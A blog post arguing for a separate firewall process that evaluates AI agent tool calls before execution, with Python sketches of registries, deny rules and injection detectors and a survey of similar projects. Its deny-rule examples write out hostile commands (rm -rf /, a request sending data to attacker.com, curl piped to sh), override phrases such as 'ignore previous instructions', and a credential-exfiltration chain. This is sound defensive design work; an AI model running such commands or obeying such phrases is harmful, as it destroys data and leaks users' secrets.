
A Smart Firewall for AI Tool Calls

What if every tool call from an AI agent had to pass through an independent process that decided whether it looked safe — before anything executed?

The Missing Layer

In the previous post we looked at where AI agent vulnerabilities actually live: not in the model, but in the thin wrapper code that parses tool calls and executes them without meaningful oversight. The model says "run this", the wrapper runs it, and nobody in between asks whether that's a good idea.

The obvious question: what would it look like to add that missing layer?

Two Problems, Two Processes

There are really two distinct gaps in the current agent architecture:

Discovery. The model needs to know which tools exist and what they can do. Today, most agent frameworks solve this with a static list baked into the system prompt — "you have access to bash, read, write, web_search." The model gets a text description of each tool and works out what to do with them. There is no runtime negotiation, no capability-based access control, no way for tools to declare their own constraints.

Evaluation. When the model generates a tool call, something needs to decide whether to actually execute it. Today that's either "always yes" (autonomous mode) or "ask the human" (interactive mode). There is nothing in between — no programmatic evaluation of whether a specific call, with these specific arguments, in this specific context, looks reasonable.

These are separate concerns and they should be separate processes.

The Tool Registry

The first piece is a registration protocol. Instead of hardcoding tool descriptions into the system prompt, tools register themselves with a proxy process at startup. Each registration includes:

  • Name and description — what the model sees
  • Input schema — structured definition of valid arguments
  • Capability declaration — what this tool can actually do (read filesystem, write filesystem, network access, execute code)
  • Constraint declaration — what this tool explicitly cannot or should not do (no writes outside this directory, no network calls to external hosts, no recursive execution)
  • Risk classification — read-only vs. mutating, local vs. networked, reversible vs. destructive
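As structured data, a registration record might look like the sketch below. This is a hypothetical shape, not MCP's wire format or any existing registry protocol; the field names, capability strings, and constraint syntax are all illustrative.

```python
from dataclasses import dataclass

# Hypothetical registration record; every field name and capability
# string here is illustrative, not part of any real protocol.
@dataclass(frozen=True)
class ToolRegistration:
    name: str            # what the model sees
    description: str
    input_schema: dict   # JSON-Schema-style definition of valid arguments
    capabilities: frozenset  # e.g. {"exec", "fs.read", "fs.write", "net"}
    constraints: tuple   # machine-checkable limits the proxy can enforce
    risk: str            # "read_only" | "mutating" | "destructive"

# A shell tool registering itself with the proxy at startup:
bash_tool = ToolRegistration(
    name="bash",
    description="Run a shell command in the sandboxed workspace",
    input_schema={"type": "object",
                  "properties": {"command": {"type": "string"}},
                  "required": ["command"]},
    capabilities=frozenset({"exec", "fs.read", "fs.write"}),
    constraints=("path_within:/workspace", "no_external_network"),
    risk="destructive",
)
```

The point of the structured form is the last three fields: once constraints and risk are data rather than prose in a description, the proxy has something concrete to enforce against.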

This is not entirely hypothetical. Anthropic's Model Context Protocol (MCP) already implements the discovery half of this pattern. MCP lets tools advertise themselves to a host application with structured schemas, and the host can expose different tool sets to different model sessions. It handles the "what tools exist and what do they accept" problem well.

What MCP does not currently handle is the constraint and risk classification layer. A tool can say "I accept a file path argument" but it cannot say "I should only be used on files within /workspace" or "I am a destructive operation that should require elevated approval." That metadata exists informally — in documentation, in tool descriptions that the model reads as natural language — but it is not machine-enforceable.

The gap between "tools describe their interface" and "tools declare their constraints" is where a registry adds value. If every tool must register its capabilities and limitations as structured data, the proxy has something to enforce against.

The Evaluation Process

The second piece is more interesting. A separate process — not the model, not the wrapper, not the tool itself — that evaluates every tool call before execution.

Think of it as a firewall that sits between the model's output parser and the tool dispatcher:

Model generates tool call
       ↓
   [Parser]  →  structured tool call (name, arguments)
       ↓
   [Evaluator Process]  →  allow / deny / modify / escalate
       ↓
   [Tool Dispatcher]  →  execute and return result

The evaluator receives the parsed tool call plus context: what task is the agent working on, what tools it has called previously in this session, what the original user instruction was. It returns one of four decisions:

  • Allow — the call is consistent with the agent's task and within the tool's declared constraints. Execute it.
  • Deny — the call violates a constraint, attempts something outside the agent's scope, or matches a known dangerous pattern. Block it and return an error to the model.
  • Modify — the call is mostly fine but needs adjustment. Scope a file path to the allowed directory. Strip dangerous flags from a command. Redact sensitive arguments from logs.
  • Escalate — the call is ambiguous. It might be fine, it might not be. Flag it for human review or for a higher-trust evaluation.
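A minimal evaluator skeleton makes the four-way decision concrete. Everything below is a toy: the tool name, the workspace convention, and the path-scoping rule are assumptions for illustration, not a real policy.

```python
from enum import Enum
from typing import NamedTuple, Optional

class Verdict(Enum):
    ALLOW = "allow"
    DENY = "deny"
    MODIFY = "modify"
    ESCALATE = "escalate"

class Decision(NamedTuple):
    verdict: Verdict
    reason: str
    modified_args: Optional[dict] = None  # only populated for MODIFY

def evaluate(tool: str, args: dict, workspace: str = "/workspace") -> Decision:
    """Toy evaluator: scope file writes into the workspace, deny escapes,
    escalate anything it has no rule for."""
    if tool == "write_file":
        path = args.get("path", "")
        if path.startswith(workspace):
            return Decision(Verdict.ALLOW, "write inside workspace")
        if not path.startswith("/"):
            # Relative path: rewrite it into the workspace rather than refuse.
            return Decision(Verdict.MODIFY, "scoped relative path",
                            {**args, "path": f"{workspace}/{path}"})
        return Decision(Verdict.DENY, "absolute path outside workspace")
    return Decision(Verdict.ESCALATE, "no rule for this tool")
```

Note that the unknown case escalates rather than allows: the evaluator's default posture is suspicion, and only rules it actually has can grant a pass.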

The critical design decision: the evaluator runs in a separate process. Not a function call inside the agent loop. A separate process with its own permissions, its own failure mode, its own logs. If the agent process is compromised, the evaluator is not. If the evaluator crashes, the agent cannot execute tools at all — fail closed, not open.
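Fail-closed is a property you can see in a few lines: the dispatcher treats any evaluator failure as a refusal. In this sketch `evaluate` stands in for what would really be an IPC or RPC round-trip to the separate evaluator process.

```python
def dispatch(call: dict, evaluate, execute) -> dict:
    """Fail-closed dispatch: if the evaluator is unreachable or crashes,
    the tool call is refused rather than waved through."""
    try:
        decision = evaluate(call)  # in practice, an RPC to the evaluator process
    except Exception as exc:
        return {"executed": False, "reason": f"evaluator unavailable: {exc}"}
    if decision != "allow":
        return {"executed": False, "reason": decision}
    return {"executed": True, "result": execute(call)}
```

The inverse design, where an evaluator exception falls through to execution, is the "fail open" mode the article warns against; the `try/except` placement is the entire difference.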

What the Evaluator Actually Checks

The evaluator does not need to understand the agent's intent. It needs to answer a simpler question: does this specific tool call, with these specific arguments, violate any rules?

Static rules cover the obvious cases:

  • bash("rm -rf /") → deny. Always.
  • write_file("/etc/passwd", ...) → deny. The agent has no business writing outside its workspace.
  • web_request("http://attacker.com/exfil?data=...") → deny. The agent should not be making requests to arbitrary external hosts.
  • bash("curl ... | sh") → deny. Piping remote content to a shell is never what you want an agent doing.
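Rules like these can be expressed as compiled regular expressions keyed by tool name. The patterns below are illustrative only; a real deny list would be much longer and would normalise arguments first (resolving paths, decoding escapes) so trivial obfuscation cannot slip past.

```python
import re

# Illustrative static deny rules; a production list would be far larger
# and applied after argument normalisation.
DENY_PATTERNS = {
    "bash": [
        re.compile(r"rm\s+-rf\s+/(\s|$)"),       # wipe the filesystem root
        re.compile(r"curl[^|]*\|\s*(sh|bash)"),  # pipe remote content to a shell
    ],
    "write_file": [
        re.compile(r"^/etc/"),                   # system config is off limits
    ],
}

def static_check(tool: str, argument: str) -> bool:
    """True if the call passes the static rules, False if it must be denied."""
    return not any(p.search(argument) for p in DENY_PATTERNS.get(tool, []))
```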

Contextual rules handle subtler cases:

  • The agent was asked to refactor a Python file but is now calling web_search. Is that expected? Maybe — it might need documentation. Flag it but allow.
  • The agent has made 47 file writes in the last 30 seconds. That's abnormal. Pause and escalate.
  • The agent is calling bash with a command that includes an environment variable it was not given. Where did it learn that variable name? Something injected it.
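The write-burst check, for instance, is just a sliding-window counter. The thresholds and the escalation verdict below are illustrative; the injectable clock is there so the behaviour can be tested deterministically.

```python
from collections import deque
import time

class WriteRateMonitor:
    """Escalate when a session exceeds a write budget inside a sliding
    window. The 30-writes-per-30-seconds default is illustrative."""
    def __init__(self, max_writes: int = 30, window_s: float = 30.0,
                 clock=time.monotonic):
        self.max_writes, self.window_s, self.clock = max_writes, window_s, clock
        self.events = deque()

    def record_write(self) -> str:
        now = self.clock()
        self.events.append(now)
        # Drop events that have aged out of the window.
        while self.events and now - self.events[0] > self.window_s:
            self.events.popleft()
        return "escalate" if len(self.events) > self.max_writes else "allow"
```

Contextual rules like this one require the evaluator to be stateful per session, which is another argument for it being a long-lived process rather than a stateless check inside the agent loop.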

Pattern matching catches prompt injection artifacts:

  • Tool arguments containing phrases like "ignore previous instructions" or "you are now"
  • Commands that attempt to read the agent's own system prompt or configuration
  • Recursive agent invocations (the agent trying to spawn another agent with elevated permissions)
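A toy version of that matcher is a list of case-insensitive signatures scanned over tool arguments. These three patterns are illustrative; production detectors carry far larger lists plus normalisation against spacing, casing, and encoding tricks.

```python
import re

# Illustrative injection signatures only; real lists are much longer.
INJECTION_PATTERNS = [
    re.compile(r"ignore\s+(all\s+)?previous\s+instructions", re.IGNORECASE),
    re.compile(r"you\s+are\s+now\b", re.IGNORECASE),
    re.compile(r"system\s+prompt", re.IGNORECASE),  # reading the agent's own prompt
]

def looks_injected(argument: str) -> bool:
    """True if a tool argument carries a known prompt-injection artifact."""
    return any(p.search(argument) for p in INJECTION_PATTERNS)
```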

Cross-tool chain detection is where it gets interesting. Individual tool calls might look benign, but the sequence tells a different story: read inbox → find credentials → send email to external address. Detecting these multi-step patterns requires the evaluator to maintain session state, not just evaluate calls in isolation.
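A minimal form of chain detection is subsequence matching over the session's call history: the steps of a known attack chain need not be consecutive, only ordered. The chain definition and tool names below are illustrative.

```python
# Illustrative attack chain: the steps must appear in order in the
# session, but other calls may occur between them.
ATTACK_CHAINS = [
    ("read_email", "read_credentials", "send_email"),
]

def chain_alert(history: list, next_tool: str) -> bool:
    """True if appending next_tool completes a known multi-step chain."""
    candidate = history + [next_tool]
    for chain in ATTACK_CHAINS:
        it = iter(candidate)
        # Subsequence check: each chain step must be found, in order,
        # somewhere in the remaining session history.
        if all(step in it for step in chain):
            return True
    return False
```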

The evaluator can itself be an LLM — a smaller, cheaper model whose only job is classification. It never generates tool calls. It never sees the full conversation. It receives a structured input (tool name, arguments, context summary) and returns a structured output (allow/deny/modify/escalate with reasoning). Its attack surface is minimal because it has no tools of its own.

This Is Already Happening

The pattern described above is not theoretical. Several projects have appeared in the last few months that implement exactly this architecture, and the convergence is striking.

AEGIS, published as an academic paper on 13 March 2026, implements what the authors call a "pre-execution firewall and audit layer." It interposes on the tool-execution path with a three-stage pipeline: deep string extraction from tool arguments, content-first risk scanning, and composable policy validation. The numbers are compelling: across a suite of 48 attack instances, AEGIS blocks all of them before execution, with a 1.2% false positive rate on 500 benign calls and just 8.3 milliseconds of median latency per interception. It supports 14 agent frameworks across Python, JavaScript, and Go. High-risk calls get held for human approval, and every decision goes into a tamper-evident audit trail using Ed25519 signatures and SHA-256 hash chaining. That last detail matters — when something goes wrong, you need to prove the log was not altered after the fact.

Agent Wall takes the "Cloudflare for AI agents" approach. It sits as a proxy between MCP clients and servers, implementing its own JSON-RPC parsing (no dependency on the MCP SDK itself) and applying a YAML-configured policy on every tool call. What makes it interesting is the defence-in-depth: an injection detector with 30+ prompt injection patterns, egress control that catches SSRF attempts including hex and octal IP obfuscation, a chain detector for multi-step attack patterns, and a kill switch for emergency deny-all. Responses get scanned too — the proxy checks what comes back from tool execution for leaked secrets and PII before it reaches the model.

Invariant Guardrails takes a different, more expressive approach. Instead of static YAML rules, it offers a Python-inspired policy language that can match across sequences of tool calls. You can write rules like "raise an error if a get_website call returns content that triggers prompt injection detection, and the next tool call is send_email." That is a cross-tool chain detection rule — it understands that individual calls might be fine but the sequence is an attack. Invariant deploys as a gateway between your application and your MCP servers or LLM provider, evaluating rules on each request without invasive code changes. It has nearly 400 GitHub stars and 250+ commits, suggesting genuine production use rather than a weekend experiment.

Claude Code's hooks system is a lighter-weight version of the same idea — shell commands that run before or after tool execution, with the ability to inspect the tool call and block it. It is script-based rather than a persistent evaluation process, but it recognises the right architectural boundary: something other than the model needs to evaluate tool calls before they execute.

The convergence here is the important signal. Four independent implementations, all arriving at the same architecture within weeks of each other: a proxy that sits between the model and tool execution, evaluating every call against a policy before anything runs. When multiple teams independently converge on the same design, it usually means the design is load-bearing.

The Economics Make Sense

The obvious objection: adding an evaluation step to every tool call adds latency and cost. AEGIS answers this directly: 8.3 milliseconds median latency. That is effectively free compared to the 1-5 seconds a typical LLM API call takes.

For rule-based evaluation, the overhead is negligible — a few milliseconds per call. You could implement the static rules as a simple process that validates arguments against patterns and only escalates to a model for ambiguous cases. The common path (routine file reads, standard commands, expected API calls) gets a fast pass. The unusual cases get scrutiny.
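That tiered design is a few lines of orchestration: cheap static rules settle the common case in microseconds, and only the ambiguous remainder pays for a model round-trip. The function names and verdict strings here are assumptions for the sketch.

```python
def tiered_evaluate(tool: str, args: dict, static_rules, llm_classify):
    """Fast path first. static_rules returns "allow", "deny", or "unsure";
    only "unsure" calls are forwarded to the (slow, costly) model."""
    verdict = static_rules(tool, args)
    if verdict in ("allow", "deny"):
        return verdict, "static rule"
    return llm_classify(tool, args), "model classification"
```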

Compare that to the cost of a compromised agent exfiltrating customer data, wiping a production database, or committing malicious code. Most teams spend more on SSL certificate management than they do on agent security.

The Design Principle

The underlying principle is simple: the thing that decides what to execute should not be the same thing that generates the request to execute.

In traditional software, we take this for granted. The application server does not evaluate its own access control — that is the job of middleware, proxies, and infrastructure policy. The database does not decide which queries to allow — that is handled by roles, permissions, and parameterised queries.

AI agents are the first major category of software where we have decided, apparently, that the thing generating the action should also be trusted to decide whether the action is appropriate. We would never accept this in any other domain. A web application that evaluated its own input validation would be considered a security joke.

The agent loop needs a firewall. Not a smarter prompt. Not a more aligned model. A separate process, with separate permissions, that evaluates every tool call against declared constraints before anything executes.

The model generates. The proxy evaluates. The tool executes. Three concerns. Three processes. Three trust boundaries.

The tools to build this are appearing now. The question is whether the industry adopts them before the first serious agent-mediated breach forces the issue.

Want to discuss this?

We write about what we're actually working on. If this is relevant to something you're building, we'd love to hear about it.